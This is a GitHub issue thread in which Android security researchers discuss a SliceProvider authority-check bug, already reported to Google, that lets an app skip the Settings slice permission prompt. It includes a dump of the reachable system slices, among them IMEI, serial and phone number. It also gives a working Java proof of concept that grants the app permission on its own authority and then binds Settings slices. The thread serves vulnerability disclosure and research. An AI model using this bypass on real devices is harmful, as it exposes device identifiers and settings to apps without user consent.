Open heeeeen opened 4 years ago
In original PoC provided to Google I've used content://android.settings.slices/action/battery_saver
, but in general bug could be used against any SliceProvider that doesn't care about what is uri authority (android.settings.slices
in above example) was requested.
List of slices from system settings that can be accessed with this bug can be dumped from rooted device once system setting slices are indexed (that is, any of them is accessed), you can use official SliceViewer to view slices.
Normally, Slices can be accessed by home screen, assistant (application selected to handle home key long press) and when other application tries to access Slice it will receive Slice with Intent that can be used to request permission from user. With this bug that permission prompt can be skipped and some of Slices can be accessed (for example those from list below (replace battery_saver
in uri specified above with value from key
to get their uri), there's few other system settings Slices that are hardcoded in SettingsSliceProvider, but they are unaffected by this bug because they rely on uri authority matching)
$ adb shell "sqlite3 -line /data/user_de/0/com.android.settings/databases/slices_index.db 'SELECT * FROM slices_index;'"
key = phone_number
title = Phone number
summary =
screentitle = About emulated device
keywords =
icon = 0
fragment = com.android.settings.deviceinfo.aboutphone.MyDeviceInfoFragment
controller = com.android.settings.deviceinfo.PhoneNumberPreferenceController
platform_slice = 0
slice_type = 0
unavailable_slice_subtitle =
key = imei_info
title = IMEI
summary =
screentitle = About emulated device
keywords =
icon = 0
fragment = com.android.settings.deviceinfo.aboutphone.MyDeviceInfoFragment
controller = com.android.settings.deviceinfo.imei.ImeiInfoPreferenceController
platform_slice = 0
slice_type = 0
unavailable_slice_subtitle =
key = build_number
title = Build number
summary =
screentitle = About emulated device
keywords =
icon = 0
fragment = com.android.settings.deviceinfo.aboutphone.MyDeviceInfoFragment
controller = com.android.settings.deviceinfo.BuildNumberPreferenceController
platform_slice = 0
slice_type = 0
unavailable_slice_subtitle =
key = os_firmware_version
title = Android version
summary =
screentitle = Android version
keywords =
icon = 0
fragment = com.android.settings.deviceinfo.firmwareversion.FirmwareVersionSettings
controller = com.android.settings.deviceinfo.firmwareversion.FirmwareVersionDetailPreferenceController
platform_slice = 0
slice_type = 0
unavailable_slice_subtitle =
key = screen_magnification_gestures_preference_screen
title = Magnify with triple-tap
summary =
screentitle = Magnification
keywords =
icon = 0
fragment = com.android.settings.accessibility.MagnificationPreferenceFragment
controller = com.android.settings.accessibility.MagnificationGesturesPreferenceController
platform_slice = 0
slice_type = 1
unavailable_slice_subtitle =
key = battery_saver
title = Battery Saver
summary = Extend battery life
screentitle = Battery Saver
keywords =
icon = 0
fragment = com.android.settings.fuelgauge.batterysaver.BatterySaverSettings
controller = com.android.settings.fuelgauge.batterysaver.BatterySaverButtonPreferenceController
platform_slice = 1
slice_type = 1
unavailable_slice_subtitle =
key = remote_volume
title = Cast volume
summary =
screentitle = Sound
keywords =
icon = 2131231348
fragment = com.android.settings.notification.SoundSettings
controller = com.android.settings.notification.RemoteVolumePreferenceController
platform_slice = 0
slice_type = 2
unavailable_slice_subtitle =
key = media_volume
title = Media volume
summary =
screentitle = Sound
keywords =
icon = 2131231069
fragment = com.android.settings.notification.SoundSettings
controller = com.android.settings.notification.MediaVolumePreferenceController
platform_slice = 0
slice_type = 2
unavailable_slice_subtitle =
key = call_volume
title = Call volume
summary =
screentitle = Sound
keywords =
icon = 2131231059
fragment = com.android.settings.notification.SoundSettings
controller = com.android.settings.notification.CallVolumePreferenceController
platform_slice = 0
slice_type = 2
unavailable_slice_subtitle =
key = ring_volume
title = Ring volume
summary =
screentitle = Sound
keywords =
icon = 2131231216
fragment = com.android.settings.notification.SoundSettings
controller = com.android.settings.notification.RingVolumePreferenceController
platform_slice = 0
slice_type = 2
unavailable_slice_subtitle =
key = alarm_volume
title = Alarm volume
summary =
screentitle = Sound
keywords =
icon = 17302288
fragment = com.android.settings.notification.SoundSettings
controller = com.android.settings.notification.AlarmVolumePreferenceController
platform_slice = 0
slice_type = 2
unavailable_slice_subtitle =
key = vibrate_when_ringing
title = Vibrate for calls
summary =
screentitle = Sound
keywords =
icon = 0
fragment = com.android.settings.notification.SoundSettings
controller = com.android.settings.notification.VibrateWhenRingPreferenceController
platform_slice = 0
slice_type = 1
unavailable_slice_subtitle =
key = airplane_mode
title = Airplane mode
summary =
screentitle = Network & internet
keywords =
icon = 2131230932
fragment = com.android.settings.network.NetworkDashboardFragment
controller = com.android.settings.network.AirplaneModePreferenceController
platform_slice = 1
slice_type = 1
unavailable_slice_subtitle =
key = auto_rotate
title = Auto-rotate screen
summary =
screentitle = Display
keywords =
icon = 0
fragment = com.android.settings.DisplaySettings
controller = com.android.settings.display.AutoRotatePreferenceController
platform_slice = 0
slice_type = 1
unavailable_slice_subtitle =
key = gesture_double_tap_power
title = Jump to camera
summary = To quickly open camera, press the power button twice. Works from any screen.
screentitle = Jump to camera
keywords =
icon = 0
fragment = com.android.settings.gestures.DoubleTapPowerSettings
controller = com.android.settings.gestures.DoubleTapPowerPreferenceController
platform_slice = 0
slice_type = 1
unavailable_slice_subtitle =
key = notification_badging
title = Allow notification dots
summary =
screentitle = Notifications
keywords =
icon = 0
fragment = com.android.settings.notification.ConfigureNotificationSettings
controller = com.android.settings.notification.BadgingNotificationPreferenceController
platform_slice = 0
slice_type = 1
unavailable_slice_subtitle =
key = hardware_info_device_model
title = Model
summary =
screentitle = Model & hardware
keywords =
icon = 0
fragment = com.android.settings.deviceinfo.hardwareinfo.HardwareInfoFragment
controller = com.android.settings.deviceinfo.hardwareinfo.DeviceModelPreferenceController
platform_slice = 0
slice_type = 0
unavailable_slice_subtitle =
key = hardware_info_device_serial
title = Serial number
summary =
screentitle = Model & hardware
keywords =
icon = 0
fragment = com.android.settings.deviceinfo.hardwareinfo.HardwareInfoFragment
controller = com.android.settings.deviceinfo.hardwareinfo.SerialNumberPreferenceController
platform_slice = 0
slice_type = 0
unavailable_slice_subtitle =
key = hardware_info_device_revision
title = Hardware version
summary =
screentitle = Model & hardware
keywords =
icon = 0
fragment = com.android.settings.deviceinfo.hardwareinfo.HardwareInfoFragment
controller = com.android.settings.deviceinfo.hardwareinfo.HardwareRevisionPreferenceController
platform_slice = 0
slice_type = 0
unavailable_slice_subtitle =
Hi, Michal, Thank you so much for your detailed analysis!
Hi, Michal
Could you show me POC? I used the following code to call the SliceProvider directly
Bundle b = new Bundle();
//b.putParcelable("slice_uri", ub.build());
Uri uriCall = Uri.parse("content://android.settings.slices");
Uri uri = Uri.parse("content://android.settings.slices/action/toggle_nfc");
b.putParcelable("slice_uri", uri);
ArrayList<SliceSpec> supportedSpecs = new ArrayList<SliceSpec>();
supportedSpecs.add(new SliceSpec("androidx.app.slice.LIST", 1));
supportedSpecs.add(new SliceSpec("androidx.slice.LIST", 1));
supportedSpecs.add(new SliceSpec("androidx.app.slice.BASIC", 1));
supportedSpecs.add(new SliceSpec("androidx.slice.BASIC", 1));
b.putParcelableArrayList("supported_specs", supportedSpecs);
//getContentResolver().call(ub.build(), "bind_slice", null, b);
Bundle reponseBundle = getContentResolver().call(uriCall, "bind_slice", null, b);
Log.d("heen", reponseBundle.getParcelable("slice").toString());
But get
12-25 19:44:13.658 25797 25797 D heen : slice:
12-25 19:44:13.658 25797 25797 D heen : image
12-25 19:44:13.658 25797 25797 D heen : text: Your Device wants to show Settings slices
12-25 19:44:13.658 25797 25797 D heen : int
12-25 19:44:13.658 25797 25797 D heen : slice:
12-25 19:44:13.658 25797 25797 D heen : image
12-25 19:44:13.658 25797 25797 D heen : action
seem it still needs user to grant the permission. Also, I found the fix to check the content provider authority. But how you not specify android.settings.slices
authority to call the uri content://android.settings.slices/action/battery_saver
.
Merry Christmas! Regards, En He
You'll need to replace Uri authority (in uri
in your code) to point your own provider as well as use sliceManager.grantSlicePermission to grant access to that Uri
My code for that was:
static final Uri TARGET_URI =
Uri.parse("content://com.example.sliceuri.myprovider/action/battery_saver");
static final Uri PROVIDER_URI =
Uri.parse("content://android.settings.slices");
private Slice doQuery() {
SliceManager sliceManager = getSystemService(SliceManager.class);
sliceManager.grantSlicePermission(getPackageName(), TARGET_URI);
Bundle extras = new Bundle();
extras.putParcelable("slice_uri", TARGET_URI);
extras.putParcelableArrayList("supported_specs", new ArrayList<Parcelable>(Arrays.asList(
new SliceSpec("androidx.slice.LIST", 1),
new SliceSpec("androidx.app.slice.BASIC", 1),
new SliceSpec("androidx.slice.BASIC", 1),
new SliceSpec("androidx.app.slice.LIST", 1)
)));
Bundle result = getContentResolver().call(
PROVIDER_URI,
"bind_slice",
null,
extras
);
return result.getParcelable("slice");
}
You'll also need to declare provider with authority com.example.sliceuri.myprovider
in AndroidManifest.xml
. This provider doesn't need to actually do anything, just returning true
from onCreate
is sufficient implementation.
michal, Thanks for your help and happy new year! I reproduced successfully.
Hi, michal, Thank you again!
I found another bug when researching your bug. :) I was wondering if I could have other ways to reach to you to talk about interesting Android bugs.
Send me an email, you can find my address in git log
of this repository (looks like GitHub doesn't show those in web interface and apparently spam bots rarely index those)
Hi, michal
Just see you got credited for another interesting bug about SlicePovider(https://android.googlesource.com/platform/frameworks/base/+/ce472cd14f7262a0f5b3ffe656af05ed673c8e08). I tried some research but got no result. It seems as if the attack could target some system slice provider like in Settings to get sensitive information? Could you give me some hint?
Thanks, heeeeen